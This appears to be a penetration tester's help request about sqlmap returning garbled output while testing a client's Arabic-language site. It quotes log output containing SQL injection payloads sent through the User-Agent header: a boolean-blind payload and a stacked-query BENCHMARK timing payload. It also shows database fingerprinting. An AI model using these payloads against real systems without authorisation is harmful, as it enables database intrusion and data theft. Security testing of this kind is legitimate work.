I am doing a test right now and I am receiving unusual output during data
retrieval.  I have never seen this from sqlmap before.  I have tried using
single or multi threads, --no-cast, and --hex options with no luck.  I am
using sqlmap 1.0-dev r5100.  Could the data in the database be in a different
language that sqlmap can't read?  The client's site is primarily in
Arabic.  I need help!!  Thanks

*Here is the output from the log file:*

Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND 6574=6574--

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query)
    Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
BENCHMARK(10000000,MD5(0x504b774c));--
---

current user:    None

current database:    None

current user is DBA:    None

sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: User-Agent
Parameter: User-Agent
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (Generic
comment)
    Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND
6574=6574--

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query)
    Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
BENCHMARK(10000000,MD5(0x504b774c));--
---

current user:    'x?'

current database:    None

current user is DBA:    None

sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: User-Agent
Parameter: User-Agent
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (Generic
comment)
    Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)') AND
6574=6574--

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query)
    Payload: sqlmap/1.0-dev (r5100) (http://www.sqlmap.org)'); SELECT
BENCHMARK(10000000,MD5(0x504b774c));--
---

current user:    'x?'

current database:    '??nx^}h'

current user is DBA:    None


*Here is the command line output during testing:*

[13:37:28] [INFO] changes made by tampering scripts are not included in
shown payload content(s)
[13:37:28] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: Apache, ASP.NET 4.0.30319, ASP.NET, Microsoft
IIS 7.0

back-end DBMS: MySQL 5
[13:37:28] [INFO] fetching current user
[13:37:28] [INFO] retrieving the length of query output
[13:37:28] [INFO] retrieved:
[13:37:32] [INFO] resumed: x?
current user:    'x?'

[13:37:32] [INFO] fetching current database
[13:37:32] [INFO] retrieving the length of query output
[13:37:32] [INFO] retrieved: 8
[13:38:32] [INFO] retrieved: ??n  x^}h
current database:    '??nx^}h'

[13:38:32] [INFO] testing if current user is DBA
[13:38:32] [INFO] fetching current user
[13:38:32] [INFO] retrieving the length of query output
[13:38:32] [INFO] retrieved: 6
[13:38:58] [WARNING] there was a problem decoding value '??????' from
expected hexadecimal form

current user is DBA:    None

[13:38:58] [INFO] fetching database users
[13:38:58] [INFO] fetching number of database users
[13:38:58] [INFO] retrieved: 48
[13:39:08] [CRITICAL] unable to retrieve the number of database users
[13:39:08] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 23 times

[*] shutting down at 13:39:08